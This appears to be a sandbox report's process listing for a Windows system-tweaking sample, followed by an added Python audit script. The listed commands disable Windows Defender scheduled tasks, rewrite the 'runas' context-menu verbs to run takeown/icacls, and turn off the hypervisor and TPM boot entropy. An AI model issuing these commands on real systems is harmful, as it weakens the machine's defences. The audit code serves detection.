C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\NetTrace\GatherNetworkInfo" /Disable  PID:116
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Offline Files\Background Synchronization" /Disable  PID:2228
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Offline Files\Logon Synchronization" /Disable  PID:2816
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /Disable  PID:3784
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Ras\MobilityManager" /Disable  PID:5248
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask" /Disable  PID:532
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Servicing\StartComponentCleanup" /Disable  PID:5188
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\SettingSync\BackupTask" /Disable  PID:4584
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\SettingSync\NetworkStateChangeTask" /Disable  PID:932
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable  PID:4740
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /Disable  PID:4480
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceAgentTask" /Disable  PID:408
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceManagerTask" /Disable  PID:3144
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /Disable  PID:5232
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\User Profile Service\HiveUploadTask" /Disable  PID:5892
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\WCM\WiFiTask" /Disable  PID:5768
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable  PID:5900
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable  PID:5988
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable  PID:2096
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable  PID:5916
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /Disable  PID:5972
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange" /Disable  PID:564
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Media Sharing\UpdateLibrary" /Disable  PID:5932
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Wininet\CacheTask" /Disable  PID:6016
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /Disable  PID:5952
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Maintenance Work" /Disable  PID:5992
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Workplace Join\Automatic-Device-Join" /Disable  PID:5976
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTask" /Disable  PID:6020
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTaskLogon" /Disable  PID:6044
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Driver Easy Scheduled Scan" /Disable  PID:2408
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /Disable  PID:5472
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /Disable  PID:5816
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Office\Office ClickToRun Service Monitor" /Disable  PID:6060
-
-
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f  PID:6088  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f  PID:1408  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f  PID:3096  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f  PID:3172  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f  PID:6092  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f  PID:4636  [Modifies system executable filetype association; Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f  PID:1532  [Modifies system executable filetype association]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f  PID:696  [Modifies system executable filetype association]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f  PID:1392  [Modifies system executable filetype association; Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f  PID:1188  [Modifies system executable filetype association; Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f  PID:264
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f  PID:6108
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f  PID:3080
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f  PID:1104
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f  PID:2176  [Modifies registry class]
-
-
C:\Windows\system32\ipconfig.exe  ipconfig /flushdns  PID:4276  [Gathers network information]
C:\Windows\system32\netsh.exe  netsh int tcp set global rss=enable  PID:4864
C:\Windows\system32\netsh.exe  netsh int tcp set global autotuninglevel=normal  PID:5228
C:\Windows\system32\netsh.exe  netsh int tcp set global ecncapability=enabled  PID:3796
C:\Windows\system32\netsh.exe  netsh int tcp set global timestamps=disabled  PID:1240
C:\Windows\system32\netsh.exe  netsh int tcp set global initialrto=2000  PID:3068
C:\Windows\system32\netsh.exe  netsh int tcp set global maxsynretransmissions=2  PID:5528
C:\Windows\system32\netsh.exe  netsh int tcp set global rsc=disabled  PID:5560
C:\Windows\system32\netsh.exe  netsh int tcp set global nonsackrttresiliency=disabled  PID:5564
C:\Windows\system32\netsh.exe  netsh int tcp set global fastopen=enabled  PID:5516
C:\Windows\system32\netsh.exe  netsh int tcp set global fastopenfallback=enabled  PID:1548
C:\Windows\system32\netsh.exe  netsh int tcp set global hystart=disabled  PID:5440
C:\Windows\system32\netsh.exe  netsh int tcp set global pacingprofile=off  PID:5480
C:\Windows\system32\bcdedit.exe  bcdedit /deletevalue useplatformclock  PID:4908
C:\Windows\system32\bcdedit.exe  bcdedit /set disabledynamictick yes  PID:2128
C:\Windows\system32\bcdedit.exe  bcdedit /set useplatformtick yes  PID:3836
C:\Windows\system32\bcdedit.exe  bcdedit /timeout 0  PID:1536
C:\Windows\system32\bcdedit.exe  bcdedit /set nx optout  PID:2476
C:\Windows\system32\bcdedit.exe  bcdedit /set bootux disabled  PID:3492
C:\Windows\system32\bcdedit.exe  bcdedit /set bootmenupolicy standard  PID:5672
C:\Windows\system32\bcdedit.exe  bcdedit /set hypervisorlaunchtype off  PID:928
C:\Windows\system32\bcdedit.exe  bcdedit /set tpmbootentropy ForceDisable  PID:2044
C:\Windows\system32\bcdedit.exe  bcdedit /set quietboot yes  PID:2372
C:\Windows\system32\bcdedit.exe  bcdedit /set {globalsettings} custom:16000067 true  PID:2212
C:\Windows\system32\bcdedit.exe  bcdedit /set {globalsettings} custom:16000069 true  PID:3592
C:\Windows\system32\bcdedit.exe  bcdedit /set {globalsettings} custom:16000068 true  PID:5772
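A host-side check for the changes the sample has made so far, as an added example in Python (not part of the sandbox report or of the sample). It reads the Windows Defender policy values, the WinDefend and wuauserv Start values and the three HKCR runas verbs through winreg, and parses `bcdedit /enum all` for the two boot settings that reduce platform security (hypervisorlaunchtype off takes Hyper-V, and with it VBS/HVCI and Credential Guard, out of the picture; tpmbootentropy ForceDisable stops the TPM from seeding the boot-time RNG). The pure helpers (`is_hijacked_verb`, `parse_bcdedit`, `weak_boot_settings`) run on any OS; `audit_host` needs Windows and an elevated prompt. SAMPLE_BCD is constructed to mirror the values the report shows the sample setting, and the CurrentControlSet paths assume ControlSet001 is the active control set on the analysed machine, as the report suggests but does not state.

```python
"""Audit a Windows host for the Defender, service, shell-verb and boot-config changes
this sample makes. Added example; pure helpers are testable anywhere, live checks
(winreg + bcdedit) need Windows and an elevated prompt."""
import re
import subprocess
import sys
from typing import Dict, List, Optional

# (HKLM subkey, value name, value that indicates the tamper). The sample wrote to
# ControlSet001; CurrentControlSet is assumed to point at it on the live host.
POLICY_CHECKS = [
    (r"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", 1),
    (r"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", 1),
    (r"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", 1),
    (r"SOFTWARE\Policies\Microsoft\Windows Defender\Spynet", "SpyNetReporting", 0),
    (r"SYSTEM\CurrentControlSet\Services\WinDefend", "Start", 4),
    (r"SYSTEM\CurrentControlSet\Services\wuauserv", "Start", 4),
]
# HKCR verbs the sample rewrites; the default value is the command Explorer runs.
RUNAS_KEYS = [r"*\shell\runas\command", r"exefile\shell\runas2\command", r"Directory\shell\runas\command"]
_HIJACK = re.compile(r"\btakeown\b|\bicacls\b", re.I)
# bcdedit elements and the value (lower-cased) that weakens the platform.
BCD_WEAK = {"hypervisorlaunchtype": "off", "tpmbootentropy": "forcedisable"}


def is_hijacked_verb(command: Optional[str]) -> bool:
    """True when a shell verb command hands the target to takeown/icacls."""
    return bool(command) and _HIJACK.search(command) is not None


def parse_bcdedit(text: str) -> Dict[str, List[str]]:
    """Map each bcdedit element name to every value seen across all entries.
    bcdedit prints 'name<2+ spaces>value'; headers and separators are skipped."""
    out: Dict[str, List[str]] = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z]\w*)\s{2,}(\S.*)$", line.strip())
        if m:
            out.setdefault(m.group(1), []).append(m.group(2).strip())
    return out


def weak_boot_settings(bcd: Dict[str, List[str]]) -> List[str]:
    """Report 'element=value' for each weakened boot setting present."""
    return [f"{name}={v}" for name, weak in BCD_WEAK.items()
            for v in bcd.get(name, []) if v.lower() == weak]


def _read_value(root, path: str, name: str):
    import winreg  # Windows only; imported lazily so the helpers above load anywhere
    try:
        with winreg.OpenKey(root, path) as key:
            return winreg.QueryValueEx(key, name)[0]
    except OSError:  # key or value absent
        return None


def audit_host() -> List[str]:
    if sys.platform != "win32":
        raise RuntimeError("live audit needs Windows (winreg + bcdedit)")
    import winreg
    findings = []
    for path, name, bad in POLICY_CHECKS:
        if _read_value(winreg.HKEY_LOCAL_MACHINE, path, name) == bad:
            findings.append(f"HKLM\\{path}\\{name} = {bad}")
    for key in RUNAS_KEYS:
        if is_hijacked_verb(_read_value(winreg.HKEY_CLASSES_ROOT, key, "")):
            findings.append(f"HKCR\\{key} runs takeown/icacls on the clicked item")
    bcd = subprocess.run(["bcdedit", "/enum", "all"], capture_output=True, text=True)
    findings += ["bcdedit " + f for f in weak_boot_settings(parse_bcdedit(bcd.stdout))]
    return findings


# Constructed bcdedit output mirroring the values the report shows the sample setting.
SAMPLE_BCD = r"""
Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \WINDOWS\system32\winload.efi
description             Windows 10
nx                      OptOut
hypervisorlaunchtype    Off
tpmbootentropy          ForceDisable
"""

if __name__ == "__main__":
    for finding in audit_host():
        print("FINDING:", finding)
```

`nx OptOut` is deliberately not flagged: it enables DEP for every process except those that explicitly opt out, which is stricter than the client default (OptIn), so it is a performance tweak rather than a weakening. The runas verbs are worth checking on any machine that has run this sample: once `HKCR\*\shell\runas\command` and `HKCR\exefile\shell\runas2\command` point at takeown/icacls, the elevated "Run as administrator" context-menu action silently changes ownership and grants the Administrators group full control of whatever was clicked.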
-
-
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f  PID:500  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f  PID:3248  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f  PID:5784  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f  PID:1912  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f  PID:3880  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f  PID:2224  [Modifies system executable filetype association; Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f  PID:2248  [Modifies system executable filetype association; Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f  PID:5276  [Modifies system executable filetype association; Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f  PID:4576  [Modifies system executable filetype association; Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f  PID:5336  [Modifies system executable filetype association; Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f  PID:5644  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f  PID:5600  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f  PID:5556  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f  PID:5716  [Modifies registry class]
C:\Windows\system32\reg.exe  Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f  PID:5684  [Modifies registry class]
-
-
C:\Windows\system32\bcdedit.exe (level 7)
bcdedit /set tscsyncpolicy Enhanced
PID:5352

C:\Windows\system32\netsh.exe (level 7)
netsh interface teredo set state disabled
PID:5328

C:\Windows\system32\netsh.exe (level 7)
netsh interface 6to4 set state disabled
PID:5512

C:\Windows\system32\netsh.exe (level 7)
netsh winsock reset
PID:5160

C:\Windows\system32\netsh.exe (level 7)
netsh int isatap set state disable
PID:5700

C:\Windows\system32\netsh.exe (level 7)
netsh int ip set global taskoffload=disabled
PID:4320

C:\Windows\system32\netsh.exe (level 7)
netsh int ip set global neighborcachelimit=4096
PID:4020

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global timestamps=disabled
PID:4428

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set heuristics disabled
PID:2684

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global autotuninglevel=disable
PID:3888

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global chimney=disabled
PID:5324

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global ecncapability=disabled
PID:5268

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global rss=enabled
PID:2216

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global rsc=disabled
PID:5176

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global dca=enabled
PID:3144

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global netdma=enabled
PID:5904

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set global nonsackrttresiliency=disabled
PID:5964

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set security mpp=disabled
PID:5956

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set security profiles=disabled
PID:5996

C:\Windows\system32\netsh.exe (level 7)
netsh int ip set global icmpredirects=disabled
PID:6016

C:\Windows\system32\netsh.exe (level 7)
netsh int tcp set security mpp=disabled profiles=disabled
PID:5992

C:\Windows\system32\netsh.exe (level 7)
netsh int ip set global multicastforwarding=disabled
PID:6000
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 7)
PowerShell Disable-NetAdapterLso -Name "*"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 7)
powershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterPowerManagement -Name $adapter.Name -ErrorAction SilentlyContinue}"
- Suspicious behavior: EnumeratesProcesses
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 7)
powershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterLso -Name $adapter.Name -ErrorAction SilentlyContinue}"
- Suspicious behavior: EnumeratesProcesses
PID:1576

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnableICMPRedirect" /t REG_DWORD /d "1" /f
PID:4860

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnablePMTUDiscovery" /t REG_DWORD /d "1" /f
PID:2032

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "Tcp1323Opts" /t REG_DWORD /d "0" /f
PID:1548

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpMaxDupAcks" /t REG_DWORD /d "2" /f
PID:2440

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpTimedWaitDelay" /t REG_DWORD /d "32" /f
PID:3352

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "GlobalMaxTcpWindowSize" /t REG_DWORD /d "8760" /f
PID:5632

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpWindowSize" /t REG_DWORD /d "8760" /f
PID:4696

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxConnectionsPerServer" /t REG_DWORD /d "0" /f
PID:4448

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxUserPort" /t REG_DWORD /d "65534" /f
PID:3644

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "SackOpts" /t REG_DWORD /d "0" /f
PID:4624

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DefaultTTL" /t REG_DWORD /d "64" /f
PID:3724

C:\Windows\system32\reg.exe (level 7)
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_SZ /d "ffffffff" /f
PID:1096
C:\Windows\system32\cmd.exe (level 4)
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
PID:4800

C:\Windows\system32\tasklist.exe (level 5)
tasklist /FO LIST
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5200

C:\Windows\system32\cmd.exe (level 4)
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
PID:1668

C:\Windows\System32\Wbem\WMIC.exe (level 5)
wmic csproduct get uuid
- Suspicious use of AdjustPrivilegeToken
PID:5192
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 1)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6448 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
PID:1448

C:\Windows\system32\AUDIODG.EXE (level 1)
C:\Windows\system32\AUDIODG.EXE 0x30c 0x4c4
PID:4376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 1)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:3704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb0
PID:4928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2040 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:2
PID:1664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2248 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:3
PID:4648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2680 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
PID:1088

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
PID:4620

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
PID:3808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4428 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
PID:1048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4564 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
PID:4620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
PID:2476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5288 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
PID:1304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5316 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
PID:2116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5432 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
PID:3980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5728 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
PID:5912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
